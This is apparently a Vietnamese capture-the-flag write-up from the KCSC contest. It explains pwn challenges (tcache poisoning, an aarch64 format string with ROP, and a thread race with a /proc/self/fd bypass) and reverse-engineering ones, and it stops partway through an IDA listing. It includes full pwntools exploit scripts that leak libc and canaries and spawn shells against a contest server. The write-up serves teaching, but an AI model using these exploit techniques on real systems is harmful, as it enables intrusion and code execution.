0x1780b2c0:     0x3333333333333333              0x3333333333333333

#sv0
0x1780b2d0:     0x3333333333333333              0x21
0x1780b2e0:     0x1780b340                      0x3f80000000000001
0x1780b2f0:     0x1780b2a0                      0x21
0x1780b300:     0x2222222222222222              0x0

0x1780b310:     0x0                             0x21
0x1780b320:     0x1781c05b                      0xbc70b1f1aac74486
0x1780b330:     0x0                             0x511
0x1780b340:     0x7fae55c1ace0 96>  0x7fae55c1ace0 96>
...


Sau khi đã có libc thì lặp lại quy trình trên 1 lần nữa, tuy nhiên lần nảy sửa con trỏ name của sv0 thành __environ để leak stack

delete(1)
add(0x10, b'\x33'*0x18+p64(0x21)+p64(libc.sym['__environ']), 1, 1)
show()
ru(b'ID: 0\nNAME: ')
stack_leak = u64(r(6) + b'\0\0')
info('[*] stack leak: ' + hex(stack_leak))

tcache poisoning

Mục tiêu cuối cùng của mình là thay đổi saved rip của hàm my_read để system("/bin/sh")

Dùng kĩ thuật Tcache Poisoning

Tính địa chỉ của saved rbp của hàm my_read sau khi xor theo cơ chế của tcache (vì khi malloc cũng cần căn chỉnh chunk sao cho lsb = 0)


ret_addr = ((heap_base+0x2e0)>>12)^(stack_leak - 0x178)


Sửa fd của chunk trong tache

delete(1)
add(0x10, b'\x33'*0x18+p64(0x41)+p64(heap_base+0x300), 1, 1)
delete(0)
delete(0)
add(0x10, b'\x33'*0x18+p64(0x41)+p64(ret_addr), 1, 1)



Vậy là đã có được địa chi saved rbp trong tcache

Giờ malloc nó và lấy shell thôi


pop_rdi = libc.address + 0x000000000002a3e5
binsh = next(libc.search(b'/bin/sh\0'))
ret = 0x000000000040101a
add(0x30, b'\0', 1, 1)
add(0x30, p64(0)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(libc.sym['system']),1,1)


KCSC{Have_you_passed_LapTrinhCanBan_yet?}

Full script
#!/usr/bin/python3

from pwn import *

context.binary = exe = ELF('./chall_patched', checksec=False)
libc = ELF('./libc.so.6', checksec=False)
ld = ELF('./ld-linux-x86-64.so.2', checksec=False)

info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
slan = lambda msg, num: sla(msg, str(num).encode())
san = lambda msg, num: sa(msg, str(num).encode())
sln = lambda num: sl(str(num).encode())
sn = lambda num: s(str(num).encode())
r = lambda nbytes: p.recv(nbytes)
ru = lambda data: p.recvuntil(data)
rl = lambda : p.recvline()

def GDB():
    if not args.REMOTE:
        gdb.attach(p, gdbscript=f'''
            b*0x401539
            b*0x401664
            b*0x4015c4
            b*0x401374
            c
            ''')

if args.REMOTE:
    conn = 'nc 36.50.177.41 50006'.split()
    p = remote(conn[1], int(conn[2]))
else:
    p = process(exe.path)
GDB()

def decrypt(cipher):
    key = 0
    result = 0
    for i in range(6):
        bits = 64 - 12 * i
        if bits < 0: bits = 0
        result = ((cipher ^ key) >> bits) << bits
        key = result >> 12
    return result

def add(size, name, age, score):
    slan(b'> ', 1)
    slan(b'Size name: ', size)
    sa(b'Name: ', name)
    slan(b'Age: ', age)
    slan(b'Score: ', score)

def show():
    slan(b'> ', 2)

def delete(idx):
    slan(b'> ', 3)
    slan(b'Index: ', idx)

add(0x10, b'\x11'*8, 1, 1)
add(0x10, b'\x22'*8, 1, 1)

delete(1)

delete(0)
add(0x10, b'\x33'*0x20, 1, 1)
show()
ru(b'\x33'*0x20)
heap_base = decrypt(u64(r(4) + b'\0\0\0\0')) & ~0xfff
info('[*] heap base: ' + hex(heap_base))

delete(0)
add(0x10, b'\x33'*0x18 + p64(0x21), 1, 1)
add(0x10, b'\x22'*8, 1, 1)

add(0x500, b'\x44'*8, 1, 1)
add(0x30, b'\x55'*8, 1, 1)
delete(3)
delete(2)

delete(0)
add(0x10, b'\x33'*0x18+p64(0x21)+b'\x40', 1, 1)
show()
ru(b'ID: 0\nNAME: ')
libc_leak = u64(r(6) + b'\0\0')
libc.address = libc_leak - 0x21ace0
info('[*] libc base: ' + hex(libc.address))

delete(1)
add(0x10, b'\x33'*0x18+p64(0x21)+p64(libc.sym['__environ']), 1, 1)
show()
ru(b'ID: 0\nNAME: ')
stack_leak = u64(r(6) + b'\0\0')
info('[*] stack leak: ' + hex(stack_leak))

ret_addr = ((heap_base+0x2e0)>>12)^(stack_leak - 0x178)
delete(1)
add(0x10, b'\x33'*0x18+p64(0x41)+p64(heap_base+0x300), 1, 1)
delete(0)
delete(0)
add(0x10, b'\x33'*0x18+p64(0x41)+p64(ret_addr), 1, 1)

pop_rdi = libc.address + 0x000000000002a3e5
binsh = next(libc.search(b'/bin/sh\0'))
ret = 0x000000000040101a
add(0x30, b'\0', 1, 1)
add(0x30, p64(0)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(libc.sym['system']),1,1)

p.interactive()

KCSC Shop

một bài viết về arm rất hay của anh hlaan đã hỗ trợ mình rất nhiều trong khi làm bài này

Phân tích


Khác với các bài trước đó được viết với kiến trúc amd64, bài này được viết với aarch64


void main(void)

{
  uint uVar1;
  int iVar2;
  char local_38 [48];
  long local_8;

  local_8 = __stack_chk_guard;
  initialize(&__stack_chk_guard,0);
  local_38[0] = '\0';
  local_38[1] = '\0';
  local_38[2] = '\0';
  local_38[3] = '\0';
  local_38[4] = '\0';
  local_38[5] = '\0';
  local_38[6] = '\0';
  local_38[7] = '\0';
  local_38[8] = '\0';
  local_38[9] = '\0';
  local_38[10] = '\0';
  local_38[0xb] = '\0';
  local_38[0xc] = '\0';
  local_38[0xd] = '\0';
  local_38[0xe] = '\0';
  local_38[0xf] = '\0';
  local_38[0x10] = '\0';
  local_38[0x11] = '\0';
  local_38[0x12] = '\0';
  local_38[0x13] = '\0';
  local_38[0x14] = '\0';
  local_38[0x15] = '\0';
  local_38[0x16] = '\0';
  local_38[0x17] = '\0';
  local_38[0x18] = '\0';
  local_38[0x19] = '\0';
  local_38[0x1a] = '\0';
  local_38[0x1b] = '\0';
  local_38[0x1c] = '\0';
  local_38[0x1d] = '\0';
  local_38[0x1e] = '\0';
  local_38[0x1f] = '\0';
  local_38[0x20] = '\0';
  local_38[0x21] = '\0';
  local_38[0x22] = '\0';
  local_38[0x23] = '\0';
  local_38[0x24] = '\0';
  local_38[0x25] = '\0';
  local_38[0x26] = '\0';
  local_38[0x27] = '\0';
  local_38[0x28] = '\0';
  local_38[0x29] = '\0';
  local_38[0x2a] = '\0';
  local_38[0x2b] = '\0';
  local_38[0x2c] = '\0';
  local_38[0x2d] = '\0';
  local_38[0x2e] = '\0';
  local_38[0x2f] = '\0';
  puts("Hello!\nWelcome to KCSC shopping mall");
  puts("What ur name, sir?");
  printf("> ");
  read(0,local_38,0x38);
  printf("OK, hi ");
  printf(local_38);
  uVar1 = sleep(1);
  iVar2 = ask_the_shop_owner(uVar1);
  if (iVar2 == 1) {
    get_date();
  }
  else if (iVar2 == 2) {
    buy_a_gift();
    if (count_gift != 0) {
      feedback();
    }
  }
  puts("Ahh, have a good day, sir");
  puts("Bye");
  if (local_8 != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail(0);
  }
  return;
}


Ở dòng 64 có lỗi Format String khi in ra tên
  

Vì là aarch64 nên từ arg thứ 8 mới truyền vào trong stack, nên sẽ dùng %9$p để leak libc và %17$p để leak canary

Tiếp đến có 2 lựa chọn, nếu chọn 1 chỉ in ra ngày nên bỏ qua


int get_date(void)

{
  int iVar1;

  iVar1 = system("/bin/date");
  return iVar1;
}


Lựa chọn 2 thì sẽ được mua hàng và để lại feedback

void buy_a_gift(void)

{
  int iVar1;
  undefined8 local_18;
  undefined8 uStack_10;
  long local_8;

  local_8 = __stack_chk_guard;
  local_18 = 0;
  uStack_10 = 0;
  iVar1 = menu(&local_18,0);
  if (iVar1 == 1) {
    red_packet();
  }
  else if (iVar1 == 2) {
    red_wine();
  }
  else if (iVar1 != 3) {
    puts("I don\'t have that stuff, sir");
  }
  if (local_8 != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

void red_packet(void)

{
  long local_10;
  long local_8;

  local_8 = __stack_chk_guard;
  puts("Oh, red packet is a good choice");
  puts("How much money do you want to put in the red packet?");
  printf("> ");
  __isoc99_scanf(&DAT_004012f8,&local_10);
  getchar();
  if (1000000 < local_10) {
    puts("Wow, you are so rich");
    is_VIP = 1;
  }
  puts("OK, I\'ll pack it for you");
  count_gift = count_gift + 1;
  if (local_8 != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

void red_wine(void)

{
  int local_c;
  long local_8;

  local_8 = __stack_chk_guard;
  puts("Oh, red wine is a good choice");
  puts("How old do you want the wine to be?");
  printf("> ");
  __isoc99_scanf(&DAT_004011f0,&local_c);
  getchar();
  if (0x32 < local_c) {
    puts("Wow, you are such a wine connoisseur");
    is_VIP = 1;
  }
  puts("OK, I\'ll pack it for you");
  count_gift = count_gift + 1;
  if (local_8 != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}


Ở cả 2 sản phẩm thì đều có khả năng kích hoạt VIP

void feedback(void)

{
  char acStack_70 [104];
  long local_8;

  local_8 = __stack_chk_guard;
  puts("I\'m glad to here your feedback:");
  printf("> ");
  if (is_VIP == '\x01') {
    fgets(acStack_70,0x100,stdin);
  }
  else {
    read(0,acStack_70,0x68);
  }
  puts("Hmmm, I\'ll notice that and thanks for ur report");
  if (local_8 != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}


Khi để lại feedback, nếu là VIP thì sẽ được nhiều lời hơn => Stack Buffer Overflow => ROP để thực thi system("/bin/sh")

Leak canary + libc
sa(b'> ', b'%9$p_%17$p')
ru(b'OK, hi ')
# khi khai thác local thì địa chỉ dài hơn trên server
# libc_leak = int(r(14), 16)
libc_leak = int(r(12), 16)
libc.address = libc_leak - 0x273fc
info('[*] libc leak: ' + hex(libc_leak))
info('[*] libc base: ' + hex(libc.address))
ru(b'_')
canary = int(r(18), 16)
info('[*] canary: ' + hex(canary))
binsh = next(libc.search(b'/bin/sh\0'))
system = libc.sym['system']
info('[*] /bin/sh: ' + hex(binsh))
info('[*] system: ' + hex(system))


Rop

Tiếp đến thì sẽ mua hàng sao cho kích hoạt được VIP

slan(b'mind\n> ', 2)
slan(b'wine\n> ', 1)
slan(b' packet?\n> ', 2000000)



Nạp VIP thành công nếu được để lại feedback bằng fgets(acStack_70,0x100,stdin);

Tiếp đến là sẽ ROP. Khác với amd64 (điều khiển saved rip của hàmfeedback) thì trong aarch64 sẽ điều khiển được saved rip của hàm gọi hàm feedback (là hàm main)

Sau một lúc tham khảo google và ngồi thử thì kiếm được 2 cái phù hợp

Chuyển /bin/sh vào x22 rồi vào x0 là arg đầu tiên

Chuyển system vào x21 -> nhảy vào địa chỉ của x21 là system




# ldp x21, x22, [sp, #0x20] ; ldp x19, x20, [sp, #0x10] ; ldp x29, x30, [sp], #0x30 ; ret
gadget1 = libc.address + 0x7b830
# mov x0, x22 ; blr x21
gadget2 = libc.address + 0x10f11c


Việc còn lại là vừa chạy thử vừa chỉnh lại payload sao cho nó chạy thôi :))

payload = b'\0'*104 + p64(canary) + p64(0) + p64(gadget1)
payload += p64(0)*7 + p64(canary) + p64(0) + p64(gadget2) + p64(0)*2
payload += p64(system) + p64(binsh)
sla(b'feedback:\n> ', payload)


KCSC{0ops_TvT_1_cl4im3d_th4t_y0U_4r3_n0t_4_n00b}

Full script
#!/usr/bin/python3
from pwn import *

context.binary = exe = ELF('./shop_patched', checksec=False)
libc = ELF('./libc.so.6', checksec=False)

info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
slan = lambda msg, num: sla(msg, str(num).encode())
san = lambda msg, num: sa(msg, str(num).encode())
sln = lambda num: sl(str(num).encode())
sn = lambda num: s(str(num).encode())
r = lambda nbytes: p.recv(nbytes)
ru = lambda data: p.recvuntil(data)
rl = lambda : p.recvline()

if args.REMOTE:
    conn = 'nc 36.50.177.41 50005'.split()
    p = remote(conn[1], int(conn[2]))
else:
    p = process(['qemu-aarch64', '-g' ,'1111' ,'./shop_patched'])
    context.log_level = 'debug' 
    raw_input('Debug')

sa(b'> ', b'%9$p_%17$p')
ru(b'OK, hi ')
libc_leak = int(r(12), 16)
libc.address = libc_leak - 0x273fc
info('[*] libc leak: ' + hex(libc_leak))
info('[*] libc base: ' + hex(libc.address))
ru(b'_')
canary = int(r(18), 16)
info('[*] canary: ' + hex(canary))
binsh = next(libc.search(b'/bin/sh\0'))
system = libc.sym['system']
info('[*] /bin/sh: ' + hex(binsh))
info('[*] system: ' + hex(system))

slan(b'mind\n> ', 2)
slan(b'wine\n> ', 1)
slan(b' packet?\n> ', 2000000)

# ldp x21, x22, [sp, #0x20] ; ldp x19, x20, [sp, #0x10] ; ldp x29, x30, [sp], #0x30 ; ret
gadget1 = libc.address + 0x7b830
# mov x0, x22 ; blr x21
gadget2 = libc.address + 0x10f11c

payload = b'\0'*104 + p64(canary) + p64(0) + p64(gadget1)
payload += p64(0)*7 + p64(canary) + p64(0) + p64(gadget2) + p64(0)*2
payload += p64(system) + p64(binsh)
sla(b'feedback:\n> ', payload)

p.interactive()

qwer
Phân tích

int setup()
{
  int result; // eax

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  result = pipe(fd);
  if ( result < 0 )
    exit(-1);
  return result;
}


Hàm setup() tạo ra một pipe và lưu vào trong biến fd
  
  


void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  pthread_t newthread; // [rsp+8h] [rbp-228h] BYREF
  char buf; // [rsp+10h] [rbp-220h] BYREF
  __int64 v5; // [rsp+11h] [rbp-21Fh]
  __int64 v6; // [rsp+19h] [rbp-217h]
  __int64 v7; // [rsp+21h] [rbp-20Fh]
  __int64 v8; // [rsp+29h] [rbp-207h]
  __int64 v9; // [rsp+31h] [rbp-1FFh]
  __int64 v10; // [rsp+39h] [rbp-1F7h]
  __int64 v11; // [rsp+41h] [rbp-1EFh]
  __int64 v12; // [rsp+49h] [rbp-1E7h]
  __int64 v13; // [rsp+51h] [rbp-1DFh]
  __int64 v14; // [rsp+59h] [rbp-1D7h]
  __int64 v15; // [rsp+61h] [rbp-1CFh]
  __int64 v16; // [rsp+69h] [rbp-1C7h]
  __int64 v17; // [rsp+71h] [rbp-1BFh]
  __int64 v18; // [rsp+79h] [rbp-1B7h]
  __int64 v19; // [rsp+81h] [rbp-1AFh]
  __int64 v20; // [rsp+89h] [rbp-1A7h]
  __int64 v21; // [rsp+91h] [rbp-19Fh]
  __int64 v22; // [rsp+99h] [rbp-197h]
  __int64 v23; // [rsp+A1h] [rbp-18Fh]
  __int64 v24; // [rsp+A9h] [rbp-187h]
  __int64 v25; // [rsp+B1h] [rbp-17Fh]
  __int64 v26; // [rsp+B9h] [rbp-177h]
  __int64 v27; // [rsp+C1h] [rbp-16Fh]
  __int64 v28; // [rsp+C9h] [rbp-167h]
  __int64 v29; // [rsp+D1h] [rbp-15Fh]
  __int64 v30; // [rsp+D9h] [rbp-157h]
  __int64 v31; // [rsp+E1h] [rbp-14Fh]
  __int64 v32; // [rsp+E9h] [rbp-147h]
  __int64 v33; // [rsp+F1h] [rbp-13Fh]
  __int64 v34; // [rsp+F9h] [rbp-137h]
  __int64 v35; // [rsp+101h] [rbp-12Fh]
  __int64 v36; // [rsp+109h] [rbp-127h]
  unsigned __int64 v37; // [rsp+218h] [rbp-18h]

  v37 = __readfsqword(0x28u);
  setup(a1, a2, a3);
  pthread_create(&newthread, 0LL, start_routine, 0LL);
  while ( 1 )
  {
    read(0, &buf, 0x200uLL);
    if ( buf == 1 )
    {
      *(_QWORD *)haystack = v5;
      qword_4068 = v6;
      qword_4070 = v7;
      qword_4078 = v8;
      qword_4080 = v9;
      qword_4088 = v10;
      qword_4090 = v11;
      qword_4098 = v12;
      qword_40A0 = v13;
      qword_40A8 = v14;
      qword_40B0 = v15;
      qword_40B8 = v16;
      qword_40C0 = v17;
      qword_40C8 = v18;
      qword_40D0 = v19;
      qword_40D8 = v20;
      qword_40E0 = v21;
      qword_40E8 = v22;
      qword_40F0 = v23;
      qword_40F8 = v24;
      qword_4100 = v25;
      qword_4108 = v26;
      qword_4110 = v27;
      qword_4118 = v28;
      qword_4120 = v29;
      qword_4128 = v30;
      qword_4130 = v31;
      qword_4138 = v32;
      qword_4140 = v33;
      qword_4148 = v34;
      qword_4150 = v35;
      qword_4158 = v36;
    }
    else if ( buf == 2 )
    {
      write(dword_4164, &buf, 1uLL);
    }
  }
}


Hàm pthread_create() tạo một thread mới và chạy hàm start_routine song song với hàm main() ở thread đầu

void __fastcall __noreturn start_routine(void *a1)
{
  char buf; // [rsp+7h] [rbp-419h] BYREF
  int fd; // [rsp+8h] [rbp-418h]
  int v3; // [rsp+Ch] [rbp-414h]
  _BYTE v4[1032]; // [rsp+10h] [rbp-410h] BYREF
  unsigned __int64 v5; // [rsp+418h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  while ( 1 )
  {
    do
      read(::fd[0], &buf, 1uLL);
    while ( (unsigned int)check(haystack) );
    fd = open(haystack, 0);
    if ( fd >= 0 && !strstr(haystack, "flag") )
    {
      v3 = read(fd, v4, 0x400uLL);
      if ( v3 >= 0 )
      {
        write(1, v4, v3);
        close(fd);
      }
    }
  }
}


Có thể thấy ở hàm main, dùng read() để nhập vào buf và các biến đằng sau đó:

Nếu buf = 0x01 thì sẽ copy các 0x100 byte đằng sau buf để lưu vào mảng haystack

Nếu buf = 0x02 thì sẽ gửi 1 byte đến hàm start_routine thông qua pipe đã tạo ở setup -> hàm start_routine sẽ chỉ chạy tiếp nếu buf = 0x02 (nếu không sẽ dừng lại ở đoạn read)




__int64 __fastcall check(__int64 a1)
{
  unsigned __int8 i; // [rsp+17h] [rbp-1h]

  for ( i = 0; *(_BYTE *)(i + a1); ++i )
  {
    if ( *(_BYTE *)(i + a1) == 'f'
      && *(_BYTE *)(i + 1LL + a1) == 'l'
      && *(_BYTE *)(i + 2LL + a1) == 'a'
      && *(_BYTE *)(i + 3LL + a1) == 'g' )
    {
      return 1LL;
    }
  }
  return 0LL;
}


Hàm check sẽ kiêm tra xem mảng haystack có cụm flag nào không nếu không thì có thể mở được file với đường dẫn được viết trong mảng haystack

Sau khi mở được file thì lại kiểm tra một lần check flag nữa, nếu qua được thì sẽ in nội dung file ra và đóng file


Khai thác

Để ý rằng mảng haystack có 0x100 (256) byte, và ở hàm check thì vòng lặp for chạy với biến i với kiểu unsigned __int8 (0-255) => nếu viết đủ 0x100 vào mảng haystack (không có flag và 0x00) thì vòng lặp này sẽ loop vô hạn

Vì ở hai thread khác nhau và chạy song song nên khi vòng lặp này loop vô hạn ở hàm start_routine, ở hàm main ta sẽ gửi 0x01+/flag (và padding NULL đủ 0x100 byte) thì mảng haystack sẽ được sửa lại và khả năng cao vòng lặp vô hạn sẽ gặp phải byte NULL và sẽ trả về 0 (bypass được hàm check) (có 2/256 tỷ lệ thất bại nếu đen lắm lúc sửa lại mảng haystack thì vòng for đang kiểm tra đúng byte / hoặc f)

Lúc này ta có thể open được file /flag tuy nhiên sẽ không thể đọc được nội dung của file và sẽ không đóng file đó lại

Có một trick (được hint từ anh mentor) giúp ta bypass được lần check thứ 2

Nôm na là khi mở một file, giả sử được trả về file descriptor là n thì tức là tạo một symlink /proc//fd/n -> /flag, khi đọc file /proc//fd/n thì cũng chính là đọc file /flag
  

Vậy ở hàm main ta chỉ cần gửi /proc//fd/n là có thể bypass được 2 lần check và đọc được file /flag



Lưu ý là ở trên local thì file descriptor là 5 nhưng trên server là 8 (debug trên Docker để biết)
KCSC{JOahandA_n3OrEu1_Joah4ndA_j0@hAe_neOr3Ul_m4n!_m4nI_jO4HandaN_MaR1Y4_83oKch@OREUd@_mO7hA3_nAE_mam1_KUK-KUk_Ary30w4_Du_83oNeUn_MAl_M07_H@3_n3o_J!g3um_JaL_D3UR3o8W@_m4eI1_9OM!NHA9o_Y3oN$EupaETDeOn_M4l_jO4h4E}

Full script
#!/usr/bin/python3
from pwn import *
context.binary = exe = ELF('./qwer', checksec=False)
def get_exe_base(pid):
    maps_file = f"/proc/{pid}/maps"
    exe_base = None
    with open(maps_file, 'r') as f:
        exe_base = int(f.readline().split('-')[0], 16)
    if exe_base is None:
        raise Exception("Executable base address not found.")
    return exe_base
def GDB():
    if not args.REMOTE:
        gdb.attach(p, gdbscript=f'''
            b*{base+0x1395}
            b*{base+0x1696}
            b*{base+0x1303}
            c
            ''')
if args.REMOTE:
    conn = 'nc 36.50.177.41 50009'.split()
    p = remote(conn[1], int(conn[2]))
else:
    p = process(exe.path)
    base = get_exe_base(p.pid)
# GDB()
fd = b'\x01'+b'/proc/self/fd/8\0'.ljust(256, b'\0')
flag = b'\x01' + b'/flag'.ljust(256, b'\0')

p.send(b'\x01' + b'/'*256)
sleep(0.2)
p.send(b'\x02')
sleep(0.2)
p.send(flag)
sleep(0.2)
p.send(fd)
sleep(0.2)
p.send(b'\x02')

p.interactive()

IV. Reverse
Cre:robertowen
HIDDEN

Mở ida dễ dàng thấy flag

Submit thử thì báo incorrect, rõ ràng là fakeflag
Vào functions thấy hàm printFlag khả nghi

Xem mã giả ta dễ dàng thấy đây chỉ là mã hóa xor từng byte của v2 với \x88

Bài này warmup nên có thể giải nhanh bằng cách debug và nhảy RIP đến hàm printFlag

Flag: KCSC{you_can't_see_me:v}

easyre

Chạy thử:

Pseudo code:
int __cdecl sub_7FF78B081280(int argc, const char **argv, const char **envp)
{
  FILE *v3; // rax
  size_t v4; // rax
  __int64 v5; // rdx
  __int64 v6; // rcx
  __int64 v7; // r8
  __int64 v8; // r9
  __int64 v9; // rax
  unsigned int v10; // edx
  unsigned int v11; // r8d
  unsigned __int64 v12; // rax
  __m128 v13; // xmm0
  __m128 v14; // xmm1
  __int64 v15; // rcx
  __int64 v16; // rax
  char *v17; // rcx
  char Buffer[16]; // [rsp+20h] [rbp-68h] BYREF
  __int128 v20; // [rsp+30h] [rbp-58h] BYREF
  int v21; // [rsp+40h] [rbp-48h]
  __int128 v22[2]; // [rsp+48h] [rbp-40h] BYREF
  __int64 v23; // [rsp+68h] [rbp-20h]
  int v24; // [rsp+70h] [rbp-18h]
  char v25; // [rsp+74h] [rbp-14h]

  LOBYTE(v21) = 0;
  v23 = 0i64;
  *(_OWORD *)Buffer = 0i64;
  v24 = 0;
  v20 = 0i64;
  v25 = 0;
  memset(v22, 0, sizeof(v22));
  sub_7FF78B081010("Enter flag: ");
  v3 = _acrt_iob_func(0);
  fgets(Buffer, 33, v3);
  v4 = strcspn(Buffer, "\n");
  if ( v4 >= 0x21 )
  {
    sub_7FF78B081558(
      v6,
      v5,
      v7,
      v8,
      *(_QWORD *)Buffer,
      *(_QWORD *)&Buffer[8],
      v20,
      *((_QWORD *)&v20 + 1),
      v21,
      *(_QWORD *)&v22[0],
      *((_QWORD *)&v22[0] + 1));
    JUMPOUT(0x7FF78B08141Ei64);
  }
  Buffer[v4] = 0;
  v9 = -1i64;
  do
    ++v9;
  while ( Buffer[v9] );
  if ( v9 == 32 )
  {
    sub_7FF78B081070(Buffer, v22);
    v10 = 0;
    v11 = 0;
    v12 = 0i64;
    do
    {
      v13 = (__m128)_mm_loadu_si128((const __m128i *)&byte_7FF78B085078[v12]);
      v11 += 32;
      v14 = (__m128)_mm_loadu_si128((const __m128i *)&v22[v12 / 0x10]);
      v12 += 32i64;
      *(__m128 *)&dword_7FF78B085058[v12 / 4] = _mm_xor_ps(v14, v13);
      *(__m128 *)&qword_7FF78B085068[v12 / 8] = _mm_xor_ps(
                                                  (__m128)_mm_loadu_si128((const __m128i *)((char *)&v20 + v12 + 8)),
                                                  (__m128)_mm_loadu_si128((const __m128i *)&qword_7FF78B085068[v12 / 8]));
    }
    while ( v11 < 0x20 );
    v15 = (int)v11;
    if ( (unsigned __int64)(int)v11 < 0x2C )
    {
      do
      {
        ++v11;
        byte_7FF78B085078[v15] ^= *((_BYTE *)v22 + v15);
        ++v15;
      }
      while ( v11 < 0x2C );
    }
    v16 = 0i64;
    while ( byte_7FF78B0832F0[v16] == byte_7FF78B085078[v16] )
    {
      ++v10;
      ++v16;
      if ( v10 >= 0x2C )
      {
        v17 = "Correct!\n";
        goto LABEL_13;
      }
    }
  }
  v17 = "Incorrect!\n";
LABEL_13:
  sub_7FF78B081010(v17);
  return 0;
}

Xem qua ta có thể thấy chương trình gọi một số hàm mã hóa và cuối cùng là check để kiểm tra flag có đúng không

Tuy code khá dài tuy nhiên ta có thể chú ý một số hàm mã hóa chính như sau
Lần 1:

Chương trình kiểm tra xem đầu vào mà ta nhập có phải là 32 ký tự hay không
Nếu đúng thì sẽ gọi hàm sub_7FF7EEA81070 để mã hóa
Nội dung hàm khá dài và khó nhìn tuy nhiên ta có thể check output để xem hàm làm gì với input
Output:


Ta có thể dễ dàng nhận ra đây là mã hóa base64 của input aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa mà ta đã nhập vào trước đó
Lần 2:

Xor từng bytes của v18 (output của base64 trước đó) với từng bytes của byte_7FF6E4DF5078 và lưu trữ kết quả luôn vào byte_7FF6E4DF5078
Cuối cùng là check: byte_7FF6E4DF5078 với byte_7FF6E4DF32F0

Nếu tất cả các bytes byte_7FF6E4DF5078 và byte_7FF6E4DF32F0 đều giống nhau thì báo Correct! nếu không thì báo Incorrect! Tổng kết:
- Nhận vào chuỗi 32 ký tự
- Mã hóa base64
- Xor với byte_7FF6E4DF5078
- Kiểm tra
Ta dễ dàng viết script decrypt:
import base64
byte_7FF6E4DF32F0=[0xC1, 0x91, 0x69, 0xB4, 0x66, 0xF9, 0x04, 0x12, 0xB2, 0xD3, 0x7D, 0x6B, 0x0F, 0xB9, 0x7F, 0xF5, 0xD2, 0x1C, 0xBF, 0x32, 0x0B, 0x32, 0x34, 0x9C, 0x98, 0xA4, 0x14, 0x37, 0x86, 0xC9, 0xAF, 0xE2, 0x9C, 0x46, 0x2B, 0xEC, 0x9F, 0x63, 0x38, 0x23, 0x54, 0x78, 0xCD, 0xF2]
byte_7FF6E4DF5078=[0x92, 0xA1, 0x27, 0xE0, 0x37, 0xCA, 0x70, 0x7E, 0xE6, 0xBE, 0x33, 0x1D, 0x5D, 0xFE, 0x29, 0x93, 0xB6, 0x66, 0xF9, 0x02, 0x6A, 0x74, 0x0D, 0xDF, 0xD6, 0xEC, 0x5A, 0x71, 0xC8, 0xA3, 0xFD, 0x84, 0xC5, 0x13, 0x1E, 0x87, 0xC7, 0x52, 0x50, 0x55, 0x01, 0x16, 0xFD, 0xCF]
a=''
for i in range(len(byte_7FF6E4DF5078)):
    a+=chr(byte_7FF6E4DF5078[i]^byte_7FF6E4DF32F0[i])
p=base64.b64decode(a.encode())
print(p.decode())
#KCSC{eNcoDe_w1th_B4sE64_aNd_XoR}

Flag: KCSC{eNcoDe_w1th_B4sE64_aNd_XoR}
Spy Room

Đây là 1 bài dotnet đơn giản, không có gì phức tạp, chủ yếu là kiểm tra khả năng xài dnspy và cryptography cơ bản
Mở dnspy:

Bài flagchecker gọi khá nhiều hàm xor
Ta có thể dùng GPT gen chương trình decode :((
def xor(a, b):
    num = max(len(a), len(b))
    result = []
    for i in range(num):
        if len(a) >= len(b):
            result.append(chr(ord(a[i]) ^ ord(b[i % len(b)])))
        else:
            result.append(chr(ord(a[i % len(a)]) ^ ord(b[i])))
    return result

def reverse_xor(source, url):
    source_chars = [chr(e) for e in source]
    array6 = xor(source_chars, list(url))
    num = len(array6)
    array2 = array6[:num // 4]
    array3 = array6[num // 4:num // 2]
    array4 = array6[num // 2:3 * num // 4]
    array5 = array6[3 * num // 4:]
    array5 = xor(array5, array2)
    array4 = xor(array4, array5)
    array3 = xor(array3, array4)
    array2 = xor(array2, array3)

    decoded_array = array2 + array3 + array4 + array5
    return ''.join(decoded_array)

def main():
    source = [
        85, 122, 105, 71, 17, 94, 71, 24, 114, 78, 107, 11, 108, 106, 107, 113, 121, 51, 91, 117, 86, 110, 100, 
        18, 124, 104, 71, 66, 123, 3, 111, 99, 74, 107, 69, 77, 111, 2, 120, 125, 83, 99, 62, 99, 109, 76, 119, 
        111, 59, 32, 1, 93, 69, 117, 84, 106, 73, 85, 112, 66, 114, 92, 61, 80, 80, 104, 111, 72, 98, 28, 88, 
        94, 27, 120, 15, 76, 15, 67, 86, 117, 81, 108, 18, 37, 34, 101, 104, 109, 23, 30, 62, 78, 88, 10, 2, 63, 
        43, 72, 102, 38, 76, 23, 34, 62, 21, 97, 1, 97
    ]
    url = "https://www.youtube.com/watch?v=L8XbI9aJOXk"
    decoded_text = reverse_xor(source, url)

    print(decoded_text)

if __name__ == "__main__":
    main()
#VXpCT1ZGRXpkRVpaV0U0MVdEQldkVmt6U2pWalNGSndZakkxWmxZeWJEQmhSamxGWWpOU1QxSldVbVpWU0VwMldqTkthR0pVYjNwbVVUMDk=

Output là chuỗi đã bị mã hóa base64 nhiều lần

Flag : KCSC{Easy_Encryption_With_DotNET_Program:3}
EzRev

Pseudocode IDA:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rdx
  unsigned int *v4; // r8
  int i; // [rsp+20h] [rbp-28h]
  __int64 v7; // [rsp+28h] [rbp-20h]

  sub_140001200("Enter Something: ", argv, envp);
  sub_1400012D0("%s", byte_1400047A8);
  if ( (unsigned int)sub_140001100(byte_1400047A8) == -1982483102 )
  {
